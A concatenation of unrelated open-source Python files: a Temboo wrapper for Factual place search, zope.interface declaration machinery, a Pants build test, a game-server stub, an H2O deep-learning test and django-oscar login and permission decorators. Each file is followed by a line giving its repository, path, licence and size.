# Find places by top-level category and near specified latitude, longitude coordinates.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FilterPlacesByTopLevelCategory Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, '/Library/Factual/FilterPlacesByTopLevelCategory')
def new_input_set(self):
return FilterPlacesByTopLevelCategoryInputSet()
def _make_result_set(self, result, path):
return FilterPlacesByTopLevelCategoryResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)
def set_Category(self, value):
"""
Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)
def set_Latitude(self, value):
"""
Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)
def set_Longitude(self, value):
"""
Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)
def set_Radius(self, value):
"""
Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FilterPlacesByTopLevelCategory Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Factual.)
"""
return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FilterPlacesByTopLevelCategoryResultSet(response, path)
| jordanemedlock/psychtruths | temboo/core/Library/Factual/FilterPlacesByTopLevelCategory.py | Python | apache-2.0 | 5,132 |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""Implementation of interface declarations
There are three flavors of declarations:
- Declarations are used to simply name declared interfaces.
- ImplementsDeclarations are used to express the interfaces that a
class implements (that instances of the class provides).
Implements specifications support inheriting interfaces.
- ProvidesDeclarations are used to express interfaces directly
provided by objects.
"""
from __future__ import absolute_import
__docformat__ = 'restructuredtext'
import sys
from types import FunctionType
from types import MethodType
from types import ModuleType
import weakref
from . import advice as advicemod
from .interface import InterfaceClass
from .interface import SpecificationBase
from .interface import Specification
from ._compat import CLASS_TYPES as DescriptorAwareMetaClasses
from ._compat import PYTHON3
# Registry of class-implementation specifications
BuiltinImplementationSpecifications = {}
_ADVICE_ERROR = ('Class advice impossible in Python3. '
'Use the @%s class decorator instead.')
_ADVICE_WARNING = ('The %s API is deprecated, and will not work in Python3 '
'Use the @%s class decorator instead.')
class named(object):
def __init__(self, name):
self.name = name
def __call__(self, ob):
ob.__component_name__ = self.name
return ob
class Declaration(Specification):
"""Interface declarations"""
def __init__(self, *interfaces):
Specification.__init__(self, _normalizeargs(interfaces))
def changed(self, originally_changed):
Specification.changed(self, originally_changed)
try:
del self._v_attrs
except AttributeError:
pass
def __contains__(self, interface):
"""Test whether an interface is in the specification
"""
return self.extends(interface) and interface in self.interfaces()
def __iter__(self):
"""Return an iterator for the interfaces in the specification
"""
return self.interfaces()
def flattened(self):
"""Return an iterator of all included and extended interfaces
"""
return iter(self.__iro__)
def __sub__(self, other):
"""Remove interfaces from a specification
"""
return Declaration(
*[i for i in self.interfaces()
if not [j for j in other.interfaces()
if i.extends(j, 0)]
]
)
def __add__(self, other):
"""Add two specifications or a specification and an interface
"""
seen = {}
result = []
for i in self.interfaces():
seen[i] = 1
result.append(i)
for i in other.interfaces():
if i not in seen:
seen[i] = 1
result.append(i)
return Declaration(*result)
__radd__ = __add__
##############################################################################
#
# Implementation specifications
#
# These specify interfaces implemented by instances of classes
class Implements(Declaration):
# class whose specification should be used as additional base
inherit = None
# interfaces actually declared for a class
declared = ()
__name__ = '?'
@classmethod
def named(cls, name, *interfaces):
# Implementation method: Produce an Implements interface with
# a fully fleshed out __name__ before calling the constructor, which
# sets bases to the given interfaces and which may pass this object to
# other objects (e.g., to adjust dependents). If they're sorting or comparing
# by name, this needs to be set.
inst = cls.__new__(cls)
inst.__name__ = name
inst.__init__(*interfaces)
return inst
def __repr__(self):
return '<implementedBy %s>' % (self.__name__)
def __reduce__(self):
return implementedBy, (self.inherit, )
def __cmp(self, other):
# Yes, I did mean to name this __cmp, rather than __cmp__.
# It is a private method used by __lt__ and __gt__.
# This is based on, and compatible with, InterfaceClass.
# (The two must be mutually comparable to be able to work in e.g., BTrees.)
# Instances of this class generally don't have a __module__ other than
# `zope.interface.declarations`, whereas they *do* have a __name__ that is the
# fully qualified name of the object they are representing.
# Note, though, that equality and hashing are still identity based. This
# accounts for things like nested objects that have the same name (typically
# only in tests) and is consistent with pickling. As far as comparisons to InterfaceClass
# goes, we'll never have equal name and module to those, so we're still consistent there.
# Instances of this class are essentially intended to be unique and are
# heavily cached (note how our __reduce__ handles this) so having identity
# based hash and eq should also work.
if other is None:
return -1
n1 = (self.__name__, self.__module__)
n2 = (getattr(other, '__name__', ''), getattr(other, '__module__', ''))
# This spelling works under Python3, which doesn't have cmp().
return (n1 > n2) - (n1 < n2)
def __hash__(self):
return Declaration.__hash__(self)
# We want equality to be based on identity. However, we can't actually
# implement __eq__/__ne__ to do this because sometimes we get wrapped in a proxy.
# We need to let the proxy types implement these methods so they can handle unwrapping
# and then rely on: (1) the interpreter automatically changing `implements == proxy` into
# `proxy == implements` (which will call proxy.__eq__ to do the unwrapping) and then
# (2) the default equality semantics being identity based.
def __lt__(self, other):
c = self.__cmp(other)
return c < 0
def __le__(self, other):
c = self.__cmp(other)
return c <= 0
def __gt__(self, other):
c = self.__cmp(other)
return c > 0
def __ge__(self, other):
c = self.__cmp(other)
return c >= 0
def _implements_name(ob):
# Return the __name__ attribute to be used by its __implemented__
# property.
# This must be stable for the "same" object across processes
# because it is used for sorting. It needn't be unique, though, in cases
# like nested classes named Foo created by different functions, because
# equality and hashing is still based on identity.
# It might be nice to use __qualname__ on Python 3, but that would produce
# different values between Py2 and Py3.
return (getattr(ob, '__module__', '?') or '?') + \
'.' + (getattr(ob, '__name__', '?') or '?')
def implementedByFallback(cls):
"""Return the interfaces implemented for a class' instances
The value returned is an IDeclaration.
"""
try:
spec = cls.__dict__.get('__implemented__')
except AttributeError:
# we can't get the class dict. This is probably due to a
# security proxy. If this is the case, then probably no
# descriptor was installed for the class.
# We don't want to depend directly on zope.security in
# zope.interface, but we'll try to make reasonable
# accommodations in an indirect way.
# We'll check to see if there's an implements:
spec = getattr(cls, '__implemented__', None)
if spec is None:
# There's no spec stred in the class. Maybe its a builtin:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
return _empty
if spec.__class__ == Implements:
# we defaulted to _empty or there was a spec. Good enough.
# Return it.
return spec
# TODO: need old style __implements__ compatibility?
# Hm, there's an __implemented__, but it's not a spec. Must be
# an old-style declaration. Just compute a spec for it
return Declaration(*_normalizeargs((spec, )))
if isinstance(spec, Implements):
return spec
if spec is None:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
# TODO: need old style __implements__ compatibility?
spec_name = _implements_name(cls)
if spec is not None:
# old-style __implemented__ = foo declaration
spec = (spec, ) # tuplefy, as it might be just an int
spec = Implements.named(spec_name, *_normalizeargs(spec))
spec.inherit = None # old-style implies no inherit
del cls.__implemented__ # get rid of the old-style declaration
else:
try:
bases = cls.__bases__
except AttributeError:
if not callable(cls):
raise TypeError("ImplementedBy called for non-factory", cls)
bases = ()
spec = Implements.named(spec_name, *[implementedBy(c) for c in bases])
spec.inherit = cls
try:
cls.__implemented__ = spec
if not hasattr(cls, '__providedBy__'):
cls.__providedBy__ = objectSpecificationDescriptor
if (isinstance(cls, DescriptorAwareMetaClasses)
and
'__provides__' not in cls.__dict__):
# Make sure we get a __provides__ descriptor
cls.__provides__ = ClassProvides(
cls,
getattr(cls, '__class__', type(cls)),
)
except TypeError:
if not isinstance(cls, type):
raise TypeError("ImplementedBy called for non-type", cls)
BuiltinImplementationSpecifications[cls] = spec
return spec
implementedBy = implementedByFallback
def classImplementsOnly(cls, *interfaces):
"""Declare the only interfaces implemented by instances of a class
The arguments after the class are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace any previous declarations.
"""
spec = implementedBy(cls)
spec.declared = ()
spec.inherit = None
classImplements(cls, *interfaces)
def classImplements(cls, *interfaces):
"""Declare additional interfaces implemented for instances of a class
The arguments after the class are one or more interfaces or
interface specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
are added to any interfaces previously declared.
"""
spec = implementedBy(cls)
spec.declared += tuple(_normalizeargs(interfaces))
# compute the bases
bases = []
seen = {}
for b in spec.declared:
if b not in seen:
seen[b] = 1
bases.append(b)
if spec.inherit is not None:
for c in spec.inherit.__bases__:
b = implementedBy(c)
if b not in seen:
seen[b] = 1
bases.append(b)
spec.__bases__ = tuple(bases)
def _implements_advice(cls):
interfaces, classImplements = cls.__dict__['__implements_advice_data__']
del cls.__implements_advice_data__
classImplements(cls, *interfaces)
return cls
class implementer:
"""Declare the interfaces implemented by instances of a class.
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
@implementer(I1)
class C(object):
pass
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, DescriptorAwareMetaClasses):
classImplements(ob, *self.interfaces)
return ob
spec_name = _implements_name(ob)
spec = Implements.named(spec_name, *self.interfaces)
try:
ob.__implemented__ = spec
except AttributeError:
raise TypeError("Can't declare implements", ob)
return ob
class implementer_only:
"""Declare the only interfaces implemented by instances of a class
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
@implementer_only(I1)
class C(object): pass
is equivalent to calling::
classImplementsOnly(I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, (FunctionType, MethodType)):
# XXX Does this decorator make sense for anything but classes?
# I don't think so. There can be no inheritance of interfaces
# on a method pr function....
raise ValueError('The implementer_only decorator is not '
'supported for methods or functions.')
else:
# Assume it's a class:
classImplementsOnly(ob, *self.interfaces)
return ob
def _implements(name, interfaces, classImplements):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
frame = sys._getframe(2)
locals = frame.f_locals
# Try to make sure we were called from a class def. In 2.2.0 we can't
# check for __module__ since it doesn't seem to be added to the locals
# until later on.
if locals is frame.f_globals or '__module__' not in locals:
raise TypeError(name+" can be used only from a class definition.")
if '__implements_advice_data__' in locals:
raise TypeError(name+" can be used only once in a class definition.")
locals['__implements_advice_data__'] = interfaces, classImplements
advicemod.addClassAdvisor(_implements_advice, depth=3)
def implements(*interfaces):
"""Declare interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
implements(I1)
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer')
_implements("implements", interfaces, classImplements)
def implementsOnly(*interfaces):
"""Declare the only interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
implementsOnly(I1)
is equivalent to calling::
classImplementsOnly(I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer_only')
_implements("implementsOnly", interfaces, classImplementsOnly)
##############################################################################
#
# Instance declarations
class Provides(Declaration): # Really named ProvidesClass
"""Implement __provides__, the instance-specific specification
When an object is pickled, we pickle the interfaces that it implements.
"""
def __init__(self, cls, *interfaces):
self.__args = (cls, ) + interfaces
self._cls = cls
Declaration.__init__(self, *(interfaces + (implementedBy(cls), )))
def __reduce__(self):
return Provides, self.__args
__module__ = 'zope.interface'
def __get__(self, inst, cls):
"""Make sure that a class __provides__ doesn't leak to an instance
"""
if inst is None and cls is self._cls:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object, but only if we are
# being called on the same class that we were defined for:
return self
raise AttributeError('__provides__')
ProvidesClass = Provides
# Registry of instance declarations
# This is a memory optimization to allow objects to share specifications.
InstanceDeclarations = weakref.WeakValueDictionary()
def Provides(*interfaces):
"""Cache instance declarations
Instance declarations are shared among instances that have the same
declaration. The declarations are cached in a weak value dictionary.
"""
spec = InstanceDeclarations.get(interfaces)
if spec is None:
spec = ProvidesClass(*interfaces)
InstanceDeclarations[interfaces] = spec
return spec
Provides.__safe_for_unpickling__ = True
def directlyProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace interfaces previously declared for the object.
"""
cls = getattr(object, '__class__', None)
if cls is not None and getattr(cls, '__class__', None) is cls:
# It's a meta class (well, at least it it could be an extension class)
# Note that we can't get here from Py3k tests: there is no normal
# class which isn't descriptor aware.
if not isinstance(object,
DescriptorAwareMetaClasses):
raise TypeError("Attempt to make an interface declaration on a "
"non-descriptor-aware class")
interfaces = _normalizeargs(interfaces)
if cls is None:
cls = type(object)
issub = False
for damc in DescriptorAwareMetaClasses:
if issubclass(cls, damc):
issub = True
break
if issub:
# we have a class or type. We'll use a special descriptor
# that provides some extra caching
object.__provides__ = ClassProvides(object, cls, *interfaces)
else:
object.__provides__ = Provides(cls, *interfaces)
def alsoProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications) are
added to the interfaces previously declared for the object.
"""
directlyProvides(object, directlyProvidedBy(object), *interfaces)
def noLongerProvides(object, interface):
""" Removes a directly provided interface from an object.
"""
directlyProvides(object, directlyProvidedBy(object) - interface)
if interface.providedBy(object):
raise ValueError("Can only remove directly provided interfaces.")
class ClassProvidesBaseFallback(object):
def __get__(self, inst, cls):
if cls is self._cls:
# We only work if called on the class we were defined for
if inst is None:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object as is:
return self
return self._implements
raise AttributeError('__provides__')
ClassProvidesBasePy = ClassProvidesBaseFallback # BBB
ClassProvidesBase = ClassProvidesBaseFallback
# Try to get C base:
try:
from ._zope_interface_coptimizations import ClassProvidesBase
except ImportError:
pass
class ClassProvides(Declaration, ClassProvidesBase):
"""Special descriptor for class __provides__
The descriptor caches the implementedBy info, so that
we can get declarations for objects without instance-specific
interfaces a bit quicker.
"""
def __init__(self, cls, metacls, *interfaces):
self._cls = cls
self._implements = implementedBy(cls)
self.__args = (cls, metacls, ) + interfaces
Declaration.__init__(self, *(interfaces + (implementedBy(metacls), )))
def __reduce__(self):
return self.__class__, self.__args
# Copy base-class method for speed
__get__ = ClassProvidesBase.__get__
def directlyProvidedBy(object):
"""Return the interfaces directly provided by the given object
The value returned is an ``IDeclaration``.
"""
provides = getattr(object, "__provides__", None)
if (provides is None # no spec
or
# We might have gotten the implements spec, as an
# optimization. If so, it's like having only one base, that we
# lop off to exclude class-supplied declarations:
isinstance(provides, Implements)
):
return _empty
# Strip off the class part of the spec:
return Declaration(provides.__bases__[:-1])
def classProvides(*interfaces):
"""Declare interfaces provided directly by a class
This function is called in a class definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications)
are used to create the class's direct-object interface specification.
An error will be raised if the module class has an direct interface
specification. In other words, it is an error to call this function more
than once in a class definition.
Note that the given interfaces have nothing to do with the interfaces
implemented by instances of the class.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides for a class. For example::
classProvides(I1)
is equivalent to calling::
directlyProvides(theclass, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'provider')
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a class def
if (locals is frame.f_globals) or ('__module__' not in locals):
raise TypeError("classProvides can be used only from a "
"class definition.")
if '__provides__' in locals:
raise TypeError(
"classProvides can only be used once in a class definition.")
locals["__provides__"] = _normalizeargs(interfaces)
advicemod.addClassAdvisor(_classProvides_advice, depth=2)
def _classProvides_advice(cls):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
interfaces = cls.__dict__['__provides__']
del cls.__provides__
directlyProvides(cls, *interfaces)
return cls
class provider:
"""Class decorator version of classProvides"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
directlyProvides(ob, *self.interfaces)
return ob
def moduleProvides(*interfaces):
"""Declare interfaces provided by a module
This function is used in a module definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications) are
used to create the module's direct-object interface specification. An
error will be raised if the module already has an interface specification.
In other words, it is an error to call this function more than once in a
module definition.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides. For example::
moduleImplements(I1)
is equivalent to::
directlyProvides(sys.modules[__name__], I1)
"""
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a class def
if (locals is not frame.f_globals) or ('__name__' not in locals):
raise TypeError(
"moduleProvides can only be used from a module definition.")
if '__provides__' in locals:
raise TypeError(
"moduleProvides can only be used once in a module definition.")
locals["__provides__"] = Provides(ModuleType,
*_normalizeargs(interfaces))
##############################################################################
#
# Declaration querying support
# XXX: is this a fossil? Nobody calls it, no unit tests exercise it, no
# doctests import it, and the package __init__ doesn't import it.
def ObjectSpecification(direct, cls):
"""Provide object specifications
These combine information for the object and for it's classes.
"""
return Provides(cls, direct) # pragma: no cover fossil
def getObjectSpecificationFallback(ob):
provides = getattr(ob, '__provides__', None)
if provides is not None:
if isinstance(provides, SpecificationBase):
return provides
try:
cls = ob.__class__
except AttributeError:
# We can't get the class, so just consider provides
return _empty
return implementedBy(cls)
getObjectSpecification = getObjectSpecificationFallback
def providedByFallback(ob):
# Here we have either a special object, an old-style declaration
# or a descriptor
# Try to get __providedBy__
try:
r = ob.__providedBy__
except AttributeError:
# Not set yet. Fall back to lower-level thing that computes it
return getObjectSpecification(ob)
try:
# We might have gotten a descriptor from an instance of a
# class (like an ExtensionClass) that doesn't support
# descriptors. We'll make sure we got one by trying to get
# the only attribute, which all specs have.
r.extends
except AttributeError:
# The object's class doesn't understand descriptors.
# Sigh. We need to get an object descriptor, but we have to be
# careful. We want to use the instance's __provides__, if
# there is one, but only if it didn't come from the class.
try:
r = ob.__provides__
except AttributeError:
# No __provides__, so just fall back to implementedBy
return implementedBy(ob.__class__)
# We need to make sure we got the __provides__ from the
# instance. We'll do this by making sure we don't get the same
# thing from the class:
try:
cp = ob.__class__.__provides__
except AttributeError:
# The ob doesn't have a class or the class has no
# provides, assume we're done:
return r
if r is cp:
# Oops, we got the provides from the class. This means
# the object doesn't have it's own. We should use implementedBy
return implementedBy(ob.__class__)
return r
providedBy = providedByFallback
class ObjectSpecificationDescriptorFallback(object):
"""Implement the `__providedBy__` attribute
The `__providedBy__` attribute computes the interfaces peovided by
an object.
"""
def __get__(self, inst, cls):
"""Get an object specification for an object
"""
if inst is None:
return getObjectSpecification(cls)
provides = getattr(inst, '__provides__', None)
if provides is not None:
return provides
return implementedBy(cls)
ObjectSpecificationDescriptor = ObjectSpecificationDescriptorFallback
##############################################################################
def _normalizeargs(sequence, output = None):
"""Normalize declaration arguments
Normalization arguments might contain Declarions, tuples, or single
interfaces.
Anything but individial interfaces or implements specs will be expanded.
"""
if output is None:
output = []
cls = sequence.__class__
if InterfaceClass in cls.__mro__ or Implements in cls.__mro__:
output.append(sequence)
else:
for v in sequence:
_normalizeargs(v, output)
return output
_empty = Declaration()
try:
from ._zope_interface_coptimizations import (
getObjectSpecification,
implementedBy,
ObjectSpecificationDescriptor,
providedBy,
)
except ImportError:
pass
objectSpecificationDescriptor = ObjectSpecificationDescriptor()
| smmribeiro/intellij-community | plugins/hg4idea/testData/bin/mercurial/thirdparty/zope/interface/declarations.py | Python | apache-2.0 | 30,880 |
# coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from textwrap import dedent
from pants.backend.python.tasks2.gather_sources import GatherSources
from pants.backend.python.tasks2.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks2.select_interpreter import SelectInterpreter
from pants.base.run_info import RunInfo
from pants_test.backend.python.tasks.python_task_test_base import PythonTaskTestBase
class PythonBinaryCreateTest(PythonTaskTestBase):
@classmethod
def task_type(cls):
return PythonBinaryCreate
def setUp(self):
super(PythonBinaryCreateTest, self).setUp()
self.library = self.create_python_library('src/python/lib', 'lib', {'lib.py': dedent("""
import os
def main():
os.getcwd()
""")})
self.binary = self.create_python_binary('src/python/bin', 'bin', 'lib.lib:main',
dependencies=['//src/python/lib'])
# The easiest way to create products required by the PythonBinaryCreate task is to
# execute the relevant tasks.
si_task_type = self.synthesize_task_subtype(SelectInterpreter, 'si_scope')
gs_task_type = self.synthesize_task_subtype(GatherSources, 'gs_scope')
self.task_context = self.context(for_task_types=[si_task_type, gs_task_type],
target_roots=[self.binary])
self.run_info_dir = os.path.join(self.pants_workdir, self.options_scope, 'test/info')
self.task_context.run_tracker.run_info = RunInfo(self.run_info_dir)
si_task_type(self.task_context, os.path.join(self.pants_workdir, 'si')).execute()
gs_task_type(self.task_context, os.path.join(self.pants_workdir, 'gs')).execute()
self.test_task = self.create_task(self.task_context)
self.dist_root = os.path.join(self.build_root, 'dist')
def _check_products(self, bin_name):
pex_name = '{}.pex'.format(bin_name)
products = self.task_context.products.get('deployable_archives')
self.assertIsNotNone(products)
product_data = products.get(self.binary)
product_basedir = product_data.keys()[0]
self.assertEquals(product_data[product_basedir], [pex_name])
# Check pex copy.
pex_copy = os.path.join(self.dist_root, pex_name)
self.assertTrue(os.path.isfile(pex_copy))
def test_deployable_archive_products(self):
self.test_task.execute()
self._check_products('bin')
| 15Dkatz/pants | tests/python/pants_test/backend/python/tasks2/test_python_binary_create.py | Python | apache-2.0 | 2,644 |
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistCogdoCraneMoneyBagAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory("DistCogdoCraneMoneyBagAI")
def setIndex(self, todo0):
pass
def requestInitial(self):
pass
| silly-wacky-3-town-toon/SOURCE-COD | toontown/cogdominium/DistCogdoCraneMoneyBagAI.py | Python | apache-2.0 | 351 |
import os, sys
sys.path.insert(1, "../../../")
import h2o, tests
def deeplearning_multi():
print("Test checks if Deep Learning works fine with a multiclass training and test dataset")
prostate = h2o.import_file(h2o.locate("smalldata/logreg/prostate.csv"))
prostate[4] = prostate[4].asfactor()
hh = h2o.deeplearning(x = prostate[0:2],
y = prostate[4],
validation_x = prostate[0:2],
validation_y = prostate[4],
loss = 'CrossEntropy')
hh.show()
if __name__ == '__main__':
tests.run_test(sys.argv, deeplearning_multi)
| brightchen/h2o-3 | h2o-py/tests/testdir_algos/deeplearning/pyunit_multiclassDeepLearning.py | Python | apache-2.0 | 688 |
from functools import wraps
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import render
from django.utils.six.moves.urllib import parse
from django.utils.translation import ugettext_lazy as _
from oscar.core.compat import user_is_authenticated
def staff_member_required(view_func, login_url=None):
"""
Ensure that the user is a logged-in staff member.
* If not authenticated, redirect to a specified login URL.
* If not staff, show a 403 page
This decorator is based on the decorator with the same name from
django.contrib.admin.views.decorators. This one is superior as it allows a
redirect URL to be specified.
"""
if login_url is None:
login_url = reverse_lazy('customer:login')
@wraps(view_func)
def _checklogin(request, *args, **kwargs):
if request.user.is_active and request.user.is_staff:
return view_func(request, *args, **kwargs)
# If user is not logged in, redirect to login page
if not user_is_authenticated(request.user):
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
path = request.build_absolute_uri()
login_scheme, login_netloc = parse.urlparse(login_url)[:2]
current_scheme, current_netloc = parse.urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
messages.warning(request, _("You must log in to access this page"))
return redirect_to_login(path, login_url, REDIRECT_FIELD_NAME)
else:
# User does not have permission to view this page
raise PermissionDenied
return _checklogin
def check_permissions(user, permissions):
"""
Permissions can be a list or a tuple of lists. If it is a tuple,
every permission list will be evaluated and the outcome will be checked
for truthiness.
Each item of the list(s) must be either a valid Django permission name
(model.codename) or a property or method on the User model
(e.g. 'is_active', 'is_superuser').
Example usage:
- permissions_required(['is_staff', ])
would replace staff_member_required
- permissions_required(['is_anonymous', ])
would replace login_forbidden
- permissions_required((['is_staff',], ['partner.dashboard_access']))
allows both staff users and users with the above permission
"""
def _check_one_permission_list(perms):
regular_permissions = [perm for perm in perms if '.' in perm]
conditions = [perm for perm in perms if '.' not in perm]
# always check for is_active if not checking for is_anonymous
if (conditions and
'is_anonymous' not in conditions and
'is_active' not in conditions):
conditions.append('is_active')
attributes = [getattr(user, perm) for perm in conditions]
# evaluates methods, explicitly casts properties to booleans
passes_conditions = all([
attr() if callable(attr) else bool(attr) for attr in attributes])
return passes_conditions and user.has_perms(regular_permissions)
if not permissions:
return True
elif isinstance(permissions, list):
return _check_one_permission_list(permissions)
else:
return any(_check_one_permission_list(perm) for perm in permissions)
def permissions_required(permissions, login_url=None):
"""
Decorator that checks if a user has the given permissions.
Accepts a list or tuple of lists of permissions (see check_permissions
documentation).
If the user is not logged in and the test fails, she is redirected to a
login page. If the user is logged in, she gets a HTTP 403 Permission Denied
message, analogous to Django's permission_required decorator.
"""
if login_url is None:
login_url = reverse_lazy('customer:login')
def _check_permissions(user):
outcome = check_permissions(user, permissions)
if not outcome and user_is_authenticated(user):
raise PermissionDenied
else:
return outcome
return user_passes_test(_check_permissions, login_url=login_url)
def login_forbidden(view_func, template_name='login_forbidden.html',
status=403):
"""
Only allow anonymous users to access this view.
"""
@wraps(view_func)
def _checklogin(request, *args, **kwargs):
if not user_is_authenticated(request.user):
return view_func(request, *args, **kwargs)
return render(request, template_name, status=status)
return _checklogin
| sonofatailor/django-oscar | src/oscar/views/decorators.py | Python | bsd-3-clause | 5,064 |
#!/usr/bin/python
#----------------------------------------------------------------------
# This module is designed to live inside the "lldb" python package
